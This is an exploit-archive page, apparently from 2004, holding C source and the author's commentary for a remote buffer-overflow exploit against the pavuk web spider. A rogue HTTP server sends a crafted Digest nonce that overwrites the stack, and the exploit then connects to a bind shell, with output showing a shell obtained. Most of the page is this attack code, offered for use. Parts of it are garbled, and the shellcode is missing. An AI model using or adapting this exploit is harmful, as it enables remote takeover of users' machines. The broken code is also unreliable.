Pavuk Digest Authentication Buffer Overflow Remote Exploit

 * exploit for pavuk web spider - infamous42md AT hotpop DOT com
 *  shouts to mitakeet, skullandcircle, and thanks to matt murphy for making me
 *  realize a n00bish mistake i made.
 * this exploit probably deserves a bit of an explanation as it was not exactly
 * straight forward.  the vulnerable code looks like this, with some comments
 * inlined by me:
#if 0
char *http_get_digest_auth_str(auth_digest, method, user, pass, urlp, buf)
http_digest_info *auth_digest;
char *method;
char *user;
char *pass;
url *urlp;
char *buf;
    /* this is the buffer we bitch slap */
        char pom[1024];
        char *a1,*a2,*a3;
        char *d = url_encode_str(urlp->p.http.document, URL_PATH_UNSAFE);

    /* not yet */
        sprintf(pom, "%s:%s:%s", user, auth_digest->realm, pass);
        a1 = _md5(pom);
        sprintf(pom, "%s:%s", method, d);

    /* this turns into a 32 byte string */
        a2 = _md5(pom);

     * this is the point that we overflow the buffer.  we control
     * auth_digest->nonce, and that is where all of our evil code go.  but crap,
     * look, the string a2 gets appended to the nonce buffer, that means
     * whatever lives above the saved EIP we overwrite is going to get fuxxored
     * to.  that means the arguments to the function get trashed, usually not a
     * problem, but look below at the following sprintf().  those variables get 
     * used again, so we have to restore them to a sane state.  
    sprintf(pom, "%s:%s:%s", a1, auth_digest->nonce, a2); 
    a3 = _md5(pom);

    /* crap */
                "Digest username=\"%s\", realm=\"%s\", nonce=\"%s\", uri=\"%s\", response=\"%s\""
                user, auth_digest->realm, auth_digest->nonce, d, a3);

    /* more crap, we need to repair nearly all of the parameters */
        if (auth_digest->opaque)
                strcat(buf, ", opaque=\"");
                strcat(buf, auth_digest->opaque);
                strcat(buf, "\"");

        return buf;
 *  so u can see we can't just overflow and go.  we need to recreate at least
 *  the auth_digest pointer, the user pointer, and the buf pointer.  so, the
 *  strategy is as follows:
 *  + overwrite auth_digest to point into the buffer we control
 *  + where we point auth_digest must also contain valid pointers as they are
 *  used as the strings that get printed into buffer.
 *  + so we point those pointers towards the very end of our buffer.  the
 *  strings they point to should not be so long. our buffer is NULL termed so if
 *  they point towards the end of it, we know they'll end at a set point.
 *  + we set the user pointer to the same place as the auth_digest pointer.
 *  + we set buf to point past the end of our buffer, at some higher address.
 *  that is where all the other strings get printed to in sprintf() and
 *  strcat().
 *  + and that's about it. so our buffer looks like this:
 *  [root localho outernet] ./ps 0xbfffdb34
 *  got a shell
 *  id
 *  uid=1000(n00b) gid=100(users) groups=100(users)

#define die(x) do{ perror((x)); exit(1); }while(0)
#define SHELL_PORT 7000
#define HTTP_PORT 80
#define BS 0x1000

/* probably don't need all this */
char *reply = 
"HTTP/1.1 401 Authorization Required\n"
"Date: Sat, 07 Aug 2004 02:10:07 GMT\n"
"Server: Apache/1.3.27 (Unix) PHP/4.3.1\n"
"WWW-Authenticate: Digest realm=\"time2die\" nonce=\"%s\"\n"
"Status: 401 Not Authorized\n"
"Connection: close\n"
"Content-Type: text/html\r\n\r\n";

/* call them */
char sc[] =

int conn(struct sockaddr_in *sap)
    int sock;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock sin_port = htons(SHELL_PORT);
    sock = conn(sap);

    printf("got a shell\n\n");

    while (1) {
            FD_SET(STDIN_FILENO, &rfds);
            FD_SET(sock, &rfds);

            if (select(sock + 1, &rfds, NULL, NULL, NULL) \n", argv[0]);
        return EXIT_FAILURE;
    sscanf(argv[1], "%lx\n", &nbase);
    lsock = do_listen();

        asock = accept(lsock, (struct sockaddr *)&sa, &salen);

        if( (cpid = fork()) == 0)
            sploit(asock, &sa, nbase);
        else if(cpid 

 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits